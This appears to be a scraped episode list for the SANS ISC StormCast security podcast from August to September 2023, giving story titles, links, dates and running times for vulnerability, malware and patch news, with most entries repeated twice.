Episode Artwork

ISC StormCast for Tuesday, September 5th, 2023

What is the Origin of Passwords Submitted to Honeypots https://isc.sans.edu/diary/What%20is%20the%20origin%20of%20passwords%20submitted%20to%20honeypots%3F/30182 Creating a YARA Rule to Detect Obfuscated Strings https://isc.sans.edu/diary/Creating%20a%20YARA%20Rule%20to%20Detect%20Obfuscated%20Strings/30186 VMware Aria Operations for Networks Hardcoded Keys 2023-34039 https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/ https://github.com/sinsinology/CVE-2023-34039/ Windows will Disable TLS 1.0/1.1 https://learn.microsoft.com/en-us/windows/release-health/windows-message-center
9/5/20236 minutes, 17 seconds
Episode Artwork

ISC StormCast for Friday, September 1st, 2023

The low, low cost of (committing) cybercrime https://isc.sans.edu/forums/diary/The%20low%2C%20low%20cost%20of%20%28committing%29%20cybercrime/30176/ Unpinnable Github Actions https://www.paloaltonetworks.com/blog/prisma-cloud/unpinnable-actions-github-security/ Exploitation of Cisco ASA SSL VPNs https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns/ Splunk Vulnerabilities https://advisory.splunk.com/advisories Top Level Domain Issues https://blog.talosintelligence.com/whats-in-a-name/
9/1/20236 minutes, 20 seconds
Episode Artwork

ISC StormCast for Friday, September 1st, 2023

The low, low cost of (committing) cybercrime https://isc.sans.edu/forums/diary/The%20low%2C%20low%20cost%20of%20%28committing%29%20cybercrime/30176/ Unpinnable Github Actions https://www.paloaltonetworks.com/blog/prisma-cloud/unpinnable-actions-github-security/ Exploitation of Cisco ASA SSL VPNs https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns/ Splunk Vulnerabilities https://advisory.splunk.com/advisories Top Level Domain Issues https://blog.talosintelligence.com/whats-in-a-name/
9/1/20236 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, August 31st, 2023

Home Office/Small Business Hurricane Prep https://isc.sans.edu/diary/Home%20Office%20%20%20Small%20Business%20Hurricane%20Prep/30166 Notepad++ Vulnerabilities https://securitylab.github.com/advisories/GHSL-2023-092_Notepad__/ 7-Zip Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-23-1164/ BGP Error Handling Issues https://blog.benjojo.co.uk/post/bgp-path-attributes-grave-error-handling
8/31/20235 minutes, 34 seconds
Episode Artwork

ISC StormCast for Thursday, August 31st, 2023

Home Office/Small Business Hurricane Prep https://isc.sans.edu/diary/Home%20Office%20%20%20Small%20Business%20Hurricane%20Prep/30166 Notepad++ Vulnerabilities https://securitylab.github.com/advisories/GHSL-2023-092_Notepad__/ 7-Zip Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-23-1164/ BGP Error Handling Issues https://blog.benjojo.co.uk/post/bgp-path-attributes-grave-error-handling
8/31/20235 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, August 30th, 2023

Survival Time for Web Sites https://isc.sans.edu/diary/Survival%20time%20for%20web%20sites/30170 PDF/ActiveMime Polyglot Maldocs https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html https://blog.didierstevens.com/2023/08/29/quickpost-pdf-activemime-maldocs-yara-rule/ RocketMQ Vulnerability Exploited https://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability ManageEngine Vulnerabilty https://www.manageengine.com/security/advisory/CVE/CVE-2023-35785.html
8/30/20236 minutes, 3 seconds
Episode Artwork

ISC StormCast for Wednesday, August 30th, 2023

Survival Time for Web Sites https://isc.sans.edu/diary/Survival%20time%20for%20web%20sites/30170 PDF/ActiveMime Polyglot Maldocs https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html https://blog.didierstevens.com/2023/08/29/quickpost-pdf-activemime-maldocs-yara-rule/ RocketMQ Vulnerability Exploited https://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability ManageEngine Vulnerabilty https://www.manageengine.com/security/advisory/CVE/CVE-2023-35785.html
8/30/20236 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, August 29th, 2023

Analysis of RAR Exploit Files (CVE-2023-38831) https://isc.sans.edu/diary/Analysis+of+RAR+Exploit+Files+CVE202338831/30164 Juniper Exploit CVE-2023-36844 , CVE-2023-36845 , CVE-2023-36846 , CVE-2023-36847 https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/ Microsoft Will Enabled Extended Protection for Exchange Server by Default https://techcommunity.microsoft.com/t5/exchange-team-blog/coming-soon-enabling-extended-protection-on-exchange-server-by/ba-p/3911849 Rust Malware Stages on Crates.io https://blog.phylum.io/rust-malware-staged-on-crates-io/ SANS Community Night London Signup https://www.sans.org/mlp/community-night-cloud-security-london-september-2023
8/29/20236 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, August 29th, 2023

Analysis of RAR Exploit Files (CVE-2023-38831) https://isc.sans.edu/diary/Analysis+of+RAR+Exploit+Files+CVE202338831/30164 Juniper Exploit CVE-2023-36844 , CVE-2023-36845 , CVE-2023-36846 , CVE-2023-36847 https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/ Microsoft Will Enabled Extended Protection for Exchange Server by Default https://techcommunity.microsoft.com/t5/exchange-team-blog/coming-soon-enabling-extended-protection-on-exchange-server-by/ba-p/3911849 Rust Malware Stages on Crates.io https://blog.phylum.io/rust-malware-staged-on-crates-io/ SANS Community Night London Signup https://www.sans.org/mlp/community-night-cloud-security-london-september-2023
8/29/20236 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, August 28th, 2023

Python Malware Using Postgresql for C2 Communications https://isc.sans.edu/diary/Python%20Malware%20Using%20Postgresql%20for%20C2%20Communications/30158 macOS: Who is Behind This Network Connection? https://isc.sans.edu/diary/macOS%3A%20Who%3Fs%20Behind%20This%20Network%20Connection%3F/30160 CVE-2020-19909 Is Everything that is Wrong with CVEs https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/ Windows Certificate Confusion https://arstechnica.com/security/2023/08/a-renegade-certificate-is-removed-from-windows-then-it-returns-confusion-ensues/ NPM E-Mail Validator Package Malware https://blog.phylum.io/npm-emails-validator-package-malware/
8/28/20236 minutes, 37 seconds
Episode Artwork

ISC StormCast for Monday, August 28th, 2023

Python Malware Using Postgresql for C2 Communications https://isc.sans.edu/diary/Python%20Malware%20Using%20Postgresql%20for%20C2%20Communications/30158 macOS: Who is Behind This Network Connection? https://isc.sans.edu/diary/macOS%3A%20Who%3Fs%20Behind%20This%20Network%20Connection%3F/30160 CVE-2020-19909 Is Everything that is Wrong with CVEs https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/ Windows Certificate Confusion https://arstechnica.com/security/2023/08/a-renegade-certificate-is-removed-from-windows-then-it-returns-confusion-ensues/ NPM E-Mail Validator Package Malware https://blog.phylum.io/npm-emails-validator-package-malware/
8/28/20236 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, August 25th, 2023

How I made a "QWERTY" Keyboard Walk Password Generator with ChatGPT https://isc.sans.edu/diary/How%20I%20made%20a%20qwerty%20%3Fkeyboard%20walk%3F%20password%20generator%20with%20ChatGPT%20%20%5BGuest%20Diary%5D/30152 FBI Warns of Persistent Barracuda Backdoors https://www.ic3.gov/Media/News/2023/230823.pdf Ivanti Sentry Athentication Bypass Deep Diver CVE-2023-38035 https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/ Smoke Loader Drops Whiffy Recon WiFi Scanning and Geolocation Malware https://www.secureworks.com/blog/smoke-loader-drops-whiffy-recon-wi-fi-scanning-and-geolocation-malware
8/25/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, August 25th, 2023

How I made a "QWERTY" Keyboard Walk Password Generator with ChatGPT https://isc.sans.edu/diary/How%20I%20made%20a%20qwerty%20%3Fkeyboard%20walk%3F%20password%20generator%20with%20ChatGPT%20%20%5BGuest%20Diary%5D/30152 FBI Warns of Persistent Barracuda Backdoors https://www.ic3.gov/Media/News/2023/230823.pdf Ivanti Sentry Athentication Bypass Deep Diver CVE-2023-38035 https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/ Smoke Loader Drops Whiffy Recon WiFi Scanning and Geolocation Malware https://www.secureworks.com/blog/smoke-loader-drops-whiffy-recon-wi-fi-scanning-and-geolocation-malware
8/25/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, August 24th, 2023

More Exotic Excel Files Dropping AgentTesla https://isc.sans.edu/diary/More%20Exotic%20Excel%20Files%20Dropping%20AgentTesla/30150 CVE-2023-38831 WinRAR Vulnerability Exploited https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/ Aruba Vulnerabilities https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-012.txt
8/24/20235 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, August 24th, 2023

More Exotic Excel Files Dropping AgentTesla https://isc.sans.edu/diary/More%20Exotic%20Excel%20Files%20Dropping%20AgentTesla/30150 CVE-2023-38831 WinRAR Vulnerability Exploited https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/ Aruba Vulnerabilities https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-012.txt
8/24/20235 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, August 23rd, 2023

Fernet Encryption in Malware https://isc.sans.edu/forums/diary/Have%20You%20Ever%20Heard%20of%20the%20Fernet%20Encryption%20Algorithm%3F/30146/ Malware Triage With Inotify Tools https://isc.sans.edu/diary/Quick+Malware+Triage+With+Inotify+Tools/30142/ Adobe Coldfusion Exploited https://www.cisa.gov/known-exploited-vulnerabilities-catalog Openfire Admin Console Vulnerability Exploited https://vulncheck.com/blog/openfire-cve-2023-32315 XLoader Mac Malware Updates https://www.sentinelone.com/blog/xloaders-latest-trick-new-macos-variant-disguised-as-signed-officenote-app/
8/23/20236 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, August 23rd, 2023

Fernet Encryption in Malware https://isc.sans.edu/forums/diary/Have%20You%20Ever%20Heard%20of%20the%20Fernet%20Encryption%20Algorithm%3F/30146/ Malware Triage With Inotify Tools https://isc.sans.edu/diary/Quick+Malware+Triage+With+Inotify+Tools/30142/ Adobe Coldfusion Exploited https://www.cisa.gov/known-exploited-vulnerabilities-catalog Openfire Admin Console Vulnerability Exploited https://vulncheck.com/blog/openfire-cve-2023-32315 XLoader Mac Malware Updates https://www.sentinelone.com/blog/xloaders-latest-trick-new-macos-variant-disguised-as-signed-officenote-app/
8/23/20236 minutes, 2 seconds
Episode Artwork

ISC StormCast for Tuesday, August 22nd, 2023

SystemBC Scans and ProxyNation https://isc.sans.edu/diary/SystemBC%20Malware%20Activity%20/30138 https://cybersecurity.att.com/blogs/labs-research/proxynation-the-dark-nexus-between-proxy-apps-and-malware Exchange Server Security Update Re-Release https://techcommunity.microsoft.com/t5/exchange-team-blog/re-release-of-august-2023-exchange-server-security-update/ba-p/3900025 Ivanti Sentry Vulnerability Exploited https://forums.ivanti.com/s/article/CVE-2023-38035-API-Authentication-Bypass-on-Sentry-Administrator-Interface?language=en_US DUO Security Outage https://status.duo.com/incidents/rw7g0q7ztj8f mTLS Vulnerabilities https://github.blog/2023-08-17-mtls-when-certificate-authentication-is-done-wrong/
8/22/20236 minutes, 7 seconds
Episode Artwork

ISC StormCast for Tuesday, August 22nd, 2023

SystemBC Scans and ProxyNation https://isc.sans.edu/diary/SystemBC%20Malware%20Activity%20/30138 https://cybersecurity.att.com/blogs/labs-research/proxynation-the-dark-nexus-between-proxy-apps-and-malware Exchange Server Security Update Re-Release https://techcommunity.microsoft.com/t5/exchange-team-blog/re-release-of-august-2023-exchange-server-security-update/ba-p/3900025 Ivanti Sentry Vulnerability Exploited https://forums.ivanti.com/s/article/CVE-2023-38035-API-Authentication-Bypass-on-Sentry-Administrator-Interface?language=en_US DUO Security Outage https://status.duo.com/incidents/rw7g0q7ztj8f mTLS Vulnerabilities https://github.blog/2023-08-17-mtls-when-certificate-authentication-is-done-wrong/
8/22/20236 minutes, 7 seconds
Episode Artwork

ISC StormCast for Monday, August 21st, 2023

From a Zalando Phish to a RAT https://isc.sans.edu/diary/From%20a%20Zalando%20Phishing%20to%20a%20RAT/30136 RARLAB WinRAR Recovery Volume Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-23-1152/ Hotmail SPF Record Error Leads to spam false positives https://www.bleepingcomputer.com/news/microsoft/hotmail-email-delivery-fails-after-microsoft-misconfigures-dns/ Chinese Entanglement | DLL Hijacking in the Asian Gambling Sector https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/ Google Chrome to Warn Users of Malicious Extensions https://betanews.com/2023/08/17/google-chrome-to-warn-users-about-problematic-extensions/
8/21/20235 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, August 21st, 2023

From a Zalando Phish to a RAT https://isc.sans.edu/diary/From%20a%20Zalando%20Phishing%20to%20a%20RAT/30136 RARLAB WinRAR Recovery Volume Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-23-1152/ Hotmail SPF Record Error Leads to spam false positives https://www.bleepingcomputer.com/news/microsoft/hotmail-email-delivery-fails-after-microsoft-misconfigures-dns/ Chinese Entanglement | DLL Hijacking in the Asian Gambling Sector https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/ Google Chrome to Warn Users of Malicious Extensions https://betanews.com/2023/08/17/google-chrome-to-warn-users-about-problematic-extensions/
8/21/20235 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, August 18th, 2023

Command Line Parsing - Are These Really Unique Strings? https://isc.sans.edu/diary/Command%20Line%20Parsing%20-%20Are%20These%20Really%20Unique%20Strings%3F/30126 iOS 16 Fake Airplane Mode https://www.jamf.com/blog/fake-airplane-mode-a-mobile-tampering-technique-to-maintain-connectivity/ LinkedIn Attacks https://cyberint.com/blog/research/linkedin-accounts-under-attack-how-to-protect-yourself/ Robot Vacuum Privacy Issues https://dontvacuum.me/talks/DEFCON31/DEFCON31-vacuum-robots-final.pdf https://dontvacuum.me/
8/18/20235 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, August 18th, 2023

Command Line Parsing - Are These Really Unique Strings? https://isc.sans.edu/diary/Command%20Line%20Parsing%20-%20Are%20These%20Really%20Unique%20Strings%3F/30126 iOS 16 Fake Airplane Mode https://www.jamf.com/blog/fake-airplane-mode-a-mobile-tampering-technique-to-maintain-connectivity/ LinkedIn Attacks https://cyberint.com/blog/research/linkedin-accounts-under-attack-how-to-protect-yourself/ Robot Vacuum Privacy Issues https://dontvacuum.me/talks/DEFCON31/DEFCON31-vacuum-robots-final.pdf https://dontvacuum.me/
8/18/20235 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, August 17th, 2023

PowerShell Gallery Prone to Typosqatting, Other Sypply Chain Attacks https://www.darkreading.com/application-security/powershell-gallery-prone-to-typosquatting-other-supply-chain-attacks Windows Random Time Issues https://arstechnica.com/security/2023/08/windows-feature-that-resets-system-clocks-based-on-random-data-is-wreaking-havoc/ Energy Company Targeted in QR Code Campaign https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/ New Citrix Scanner from Mandiant https://www.mandiant.com/resources/blog/citrix-adc-vulnerability-ioc-scanner
8/17/20236 minutes, 40 seconds
Episode Artwork

ISC StormCast for Thursday, August 17th, 2023

PowerShell Gallery Prone to Typosqatting, Other Sypply Chain Attacks https://www.darkreading.com/application-security/powershell-gallery-prone-to-typosquatting-other-supply-chain-attacks Windows Random Time Issues https://arstechnica.com/security/2023/08/windows-feature-that-resets-system-clocks-based-on-random-data-is-wreaking-havoc/ Energy Company Targeted in QR Code Campaign https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/ New Citrix Scanner from Mandiant https://www.mandiant.com/resources/blog/citrix-adc-vulnerability-ioc-scanner
8/17/20236 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, August 16th, 2023

macOS Background Task Manager Bypass https://www.wired.com/story/apple-mac-background-task-management-flaw/ Ivanti Avalanche Vulnerability https://www.tenable.com/security/research/tra-2023-27 Exploiting Synology NAS Cloud Connectivity https://claroty.com/team82/research/a-pain-in-the-nas-exploiting-cloud-connectivity-to-pwn-your-nas-synology-ds920-edition Fake Crypto Currency Apps Offered as "Beta" versions https://www.ic3.gov/Media/Y2023/PSA230814
8/16/20235 minutes, 53 seconds
Episode Artwork

ISC StormCast for Wednesday, August 16th, 2023

macOS Background Task Manager Bypass https://www.wired.com/story/apple-mac-background-task-management-flaw/ Ivanti Avalanche Vulnerability https://www.tenable.com/security/research/tra-2023-27 Exploiting Synology NAS Cloud Connectivity https://claroty.com/team82/research/a-pain-in-the-nas-exploiting-cloud-connectivity-to-pwn-your-nas-synology-ds920-edition Fake Crypto Currency Apps Offered as "Beta" versions https://www.ic3.gov/Media/Y2023/PSA230814
8/16/20235 minutes, 53 seconds
Episode Artwork

ISC StormCast for Tuesday, August 15th, 2023

PDFiD False Positives Revisited https://isc.sans.edu/diary/PDFiD%3A%20False%20Positives%20Revisited/30122 CVE-2023-32019 Fix Enabled by Default; https://support.microsoft.com/en-us/topic/kb5028407-how-to-manage-the-vulnerability-associated-with-cve-2023-32019-bd6ed35f-48b1-41f6-bd19-d2d97270f080 CyberPower and Dataprobe Vulnerabilities https://www.trellix.com/en-us/about/newsroom/stories/research/the-threat-lurking-in-data-centers.html Ford WiFi Driver Vulnerability https://www.ti.com/lit/er/swra773/swra773.pdf?ts=1691717352391&ref_url=https%253A%252F%252Fmedia.ford.com%252F
8/15/20235 minutes, 51 seconds
Episode Artwork

ISC StormCast for Tuesday, August 15th, 2023

PDFiD False Positives Revisited https://isc.sans.edu/diary/PDFiD%3A%20False%20Positives%20Revisited/30122 CVE-2023-32019 Fix Enabled by Default; https://support.microsoft.com/en-us/topic/kb5028407-how-to-manage-the-vulnerability-associated-with-cve-2023-32019-bd6ed35f-48b1-41f6-bd19-d2d97270f080 CyberPower and Dataprobe Vulnerabilities https://www.trellix.com/en-us/about/newsroom/stories/research/the-threat-lurking-in-data-centers.html Ford WiFi Driver Vulnerability https://www.ti.com/lit/er/swra773/swra773.pdf?ts=1691717352391&ref_url=https%253A%252F%252Fmedia.ford.com%252F
8/15/20235 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, August 14th, 2023

Show Me All Your Windows https://isc.sans.edu/diary/Show%20me%20All%20Your%20Windows!/30116 Zero Touch Pwn https://blog.syss.com/posts/zero-touch-pwn/ Maginot DNS Spoofing Attack https://www.usenix.org/conference/usenixsecurity23/presentation/li-xiang
8/14/20235 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, August 14th, 2023

Show Me All Your Windows https://isc.sans.edu/diary/Show%20me%20All%20Your%20Windows!/30116 Zero Touch Pwn https://blog.syss.com/posts/zero-touch-pwn/ Maginot DNS Spoofing Attack https://www.usenix.org/conference/usenixsecurity23/presentation/li-xiang
8/14/20235 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, August 11th, 2023

Some things never change, such as SQL Authentication "Encryption" https://isc.sans.edu/diary/Some%20things%20never%20change%20%3F%20such%20as%20SQL%20Authentication%20%3Fencryption%3F/30112 Defender Pretender: When Windows Defender Updates Become a Security Risk https://www.blackhat.com/us-23/briefings/schedule/#defender-pretender-when-windows-defender-updates-become-a-security-risk-32706 Dell Compellent Hardcoded Key https://www.dell.com/support/kbdoc/en-us/000216615/dsa-2023-282-security-update-for-dell-storage-integration-tools-for-vmware-dsitv-vulnerabilities Vulnerabilities in Sogou Keyboard https://citizenlab.ca/2023/08/vulnerabilities-in-sogou-keyboard-encryption/
8/11/20236 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, August 11th, 2023

Some things never change, such as SQL Authentication "Encryption" https://isc.sans.edu/diary/Some%20things%20never%20change%20%3F%20such%20as%20SQL%20Authentication%20%3Fencryption%3F/30112 Defender Pretender: When Windows Defender Updates Become a Security Risk https://www.blackhat.com/us-23/briefings/schedule/#defender-pretender-when-windows-defender-updates-become-a-security-risk-32706 Dell Compellent Hardcoded Key https://www.dell.com/support/kbdoc/en-us/000216615/dsa-2023-282-security-update-for-dell-storage-integration-tools-for-vmware-dsitv-vulnerabilities Vulnerabilities in Sogou Keyboard https://citizenlab.ca/2023/08/vulnerabilities-in-sogou-keyboard-encryption/
8/11/20236 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, August 10th, 2023

Tunnelcrack VPN Vulnerability https://papers.mathyvanhoef.com/usenix2023-tunnelcrack.pdf Mozilla VPN Vulnerablity https://www.openwall.com/lists/oss-security/2023/08/03/1 Non English Exchange Server Patch Issues https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2023-exchange-server-security-updates/bc-p/3894481/highlight/true VSCode Token Security https://cycode.com/blog/exposing-vscode-secrets/ Weekly Updates for Google Chrome https://security.googleblog.com/2023/08/an-update-on-chrome-security-updates.html
8/10/20236 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, August 10th, 2023

Tunnelcrack VPN Vulnerability https://papers.mathyvanhoef.com/usenix2023-tunnelcrack.pdf Mozilla VPN Vulnerablity https://www.openwall.com/lists/oss-security/2023/08/03/1 Non English Exchange Server Patch Issues https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2023-exchange-server-security-updates/bc-p/3894481/highlight/true VSCode Token Security https://cycode.com/blog/exposing-vscode-secrets/ Weekly Updates for Google Chrome https://security.googleblog.com/2023/08/an-update-on-chrome-security-updates.html
8/10/20236 minutes, 14 seconds
Episode Artwork

ISC StormCast for Wednesday, August 9th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20August%202023%20Patch%20Tuesday/30106 Adobe Updates https://helpx.adobe.com/security/security-bulletin.html
8/9/20236 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, August 9th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20August%202023%20Patch%20Tuesday/30106 Adobe Updates https://helpx.adobe.com/security/security-bulletin.html
8/9/20236 minutes, 2 seconds
Episode Artwork

ISC StormCast for Tuesday, August 8th, 2023

Update: Researchers Scanning the Internet https://isc.sans.edu/diary/Update%3A%20Researchers%20scanning%20the%20Internet/30102 Malicious OpenBullet Configuration Files https://www.kasada.io/threat-intel-openbullet-malware/ Abusing Cloudflare Tunnels https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/
8/8/20236 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, August 8th, 2023

Update: Researchers Scanning the Internet https://isc.sans.edu/diary/Update%3A%20Researchers%20scanning%20the%20Internet/30102 Malicious OpenBullet Configuration Files https://www.kasada.io/threat-intel-openbullet-malware/ Abusing Cloudflare Tunnels https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/
8/8/20236 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, August 7th, 2023

Are Leaked Credential Dumps Used by Attackers? https://isc.sans.edu/diary/Are%20Leaked%20Credentials%20Dumps%20Used%20by%20Attackers%3F/30098 New PaperCut RCE Vulnerability https://www.horizon3.ai/cve-2023-39143-papercut-path-traversal-file-upload-rce-vulnerability/ Microsoft mitigates Power Platform Custom Code information disclosure vulnerability https://msrc.microsoft.com/blog/2023/08/microsoft-mitigates-power-platform-custom-code-information-disclosure-vulnerability/ Microsoft Publishes Token theft Playbook https://learn.microsoft.com/en-us/security/operations/token-theft-playbook
8/7/20235 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, August 7th, 2023

Are Leaked Credential Dumps Used by Attackers? https://isc.sans.edu/diary/Are%20Leaked%20Credentials%20Dumps%20Used%20by%20Attackers%3F/30098 New PaperCut RCE Vulnerability https://www.horizon3.ai/cve-2023-39143-papercut-path-traversal-file-upload-rce-vulnerability/ Microsoft mitigates Power Platform Custom Code information disclosure vulnerability https://msrc.microsoft.com/blog/2023/08/microsoft-mitigates-power-platform-custom-code-information-disclosure-vulnerability/ Microsoft Publishes Token theft Playbook https://learn.microsoft.com/en-us/security/operations/token-theft-playbook
8/7/20235 minutes, 16 seconds
Episode Artwork

ISC StormCast for Friday, August 4th, 2023

From small LNK to large malicious BAT file with zero VT score https://isc.sans.edu/diary/From%20small%20LNK%20to%20large%20malicious%20BAT%20file%20with%20zero%20VT%20score/30094 Social Engineering via Microsoft Teams https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/ Automating the Search for LOLBAS https://pentera.io/resources/whitepapers/the-lolbas-odyssey-finding-new-lolbas-and-how-you-can-too/ Sneaky Versioning Used to Bypass Scanners https://thehackernews.com/2023/08/malicious-apps-use-sneaky-versioning.html Aruba Patches https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-010.txt Mitel Patches https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-23-0008
8/4/20235 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, August 4th, 2023

From small LNK to large malicious BAT file with zero VT score https://isc.sans.edu/diary/From%20small%20LNK%20to%20large%20malicious%20BAT%20file%20with%20zero%20VT%20score/30094 Social Engineering via Microsoft Teams https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/ Automating the Search for LOLBAS https://pentera.io/resources/whitepapers/the-lolbas-odyssey-finding-new-lolbas-and-how-you-can-too/ Sneaky Versioning Used to Bypass Scanners https://thehackernews.com/2023/08/malicious-apps-use-sneaky-versioning.html Aruba Patches https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-010.txt Mitel Patches https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-23-0008
8/4/20235 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, August 3rd, 2023

Zeek and Defender Endpoint https://isc.sans.edu/diary/Zeek%20and%20Defender%20Endpoint/30088 New Ivanti MobileIron Core Vulnerability https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US Salesforce Phishing https://labs.guard.io/phishforce-vulnerability-uncovered-in-salesforces-email-services-exploited-for-phishing-32024ad4b5fa Abusing the Amazon Web Services SSM Agent as a Remote Access Trojan https://www.mitiga.io/blog/abusing-the-amazon-web-services-ssm-agent-as-a-remote-access-trojan
8/3/20236 minutes, 8 seconds
Episode Artwork

ISC StormCast for Thursday, August 3rd, 2023

Zeek and Defender Endpoint https://isc.sans.edu/diary/Zeek%20and%20Defender%20Endpoint/30088 New Ivanti MobileIron Core Vulnerability https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US Salesforce Phishing https://labs.guard.io/phishforce-vulnerability-uncovered-in-salesforces-email-services-exploited-for-phishing-32024ad4b5fa Abusing the Amazon Web Services SSM Agent as a Remote Access Trojan https://www.mitiga.io/blog/abusing-the-amazon-web-services-ssm-agent-as-a-remote-access-trojan
8/3/20236 minutes, 8 seconds
Episode Artwork

ISC StormCast for Wednesday, August 2nd, 2023

DNS Over HTTPS Summary https://isc.sans.edu/diary/Summary%20of%20DNS%20over%20HTTPS%20requests%20against%20our%20honeypots./30084 Malware Infects Airgapped Networks https://usa.kaspersky.com/about/press-releases/2023_kaspersky-uncovers-malware-for-targeted-data-exfiltration-from-air-gapped-environments Google Deleting Inactive Accounts https://support.google.com/accounts/answer/12418290?visit_id=638264210155158507-1346504535&p=inactive_account_policy_blog&rd=1 Google AMP Service Used for Phishing https://cofense.com/blog/google-amp-the-newest-of-evasive-phishing-tactic/
8/2/20235 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, August 2nd, 2023

DNS Over HTTPS Summary https://isc.sans.edu/diary/Summary%20of%20DNS%20over%20HTTPS%20requests%20against%20our%20honeypots./30084 Malware Infects Airgapped Networks https://usa.kaspersky.com/about/press-releases/2023_kaspersky-uncovers-malware-for-targeted-data-exfiltration-from-air-gapped-environments Google Deleting Inactive Accounts https://support.google.com/accounts/answer/12418290?visit_id=638264210155158507-1346504535&p=inactive_account_policy_blog&rd=1 Google AMP Service Used for Phishing https://cofense.com/blog/google-amp-the-newest-of-evasive-phishing-tactic/
8/2/20235 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, August 1st, 2023

Ivanti End Point Manager 2nd Zero Day https://forums.ivanti.com/s/article/CVE-2023-35081-Arbitrary-File-Write?language=en_US New Redis Malware Uses Unknown Initial Access Vector https://www.cadosecurity.com/redis-p2pinfect/ https://unit42.paloaltonetworks.com/peer-to-peer-worm-p2pinfect/ Google Android 0-Day Summary https://security.googleblog.com/2023/07/the-ups-and-downs-of-0-days-year-in.html Wiping Sensitive Data from Printers https://psirt.canon/advisory-information/cp2023-003/
8/1/20235 minutes, 51 seconds
Episode Artwork

ISC StormCast for Tuesday, August 1st, 2023

Ivanti End Point Manager 2nd Zero Day https://forums.ivanti.com/s/article/CVE-2023-35081-Arbitrary-File-Write?language=en_US New Redis Malware Uses Unknown Initial Access Vector https://www.cadosecurity.com/redis-p2pinfect/ https://unit42.paloaltonetworks.com/peer-to-peer-worm-p2pinfect/ Google Android 0-Day Summary https://security.googleblog.com/2023/07/the-ups-and-downs-of-0-days-year-in.html Wiping Sensitive Data from Printers https://psirt.canon/advisory-information/cp2023-003/
8/1/20235 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, July 31st, 2023

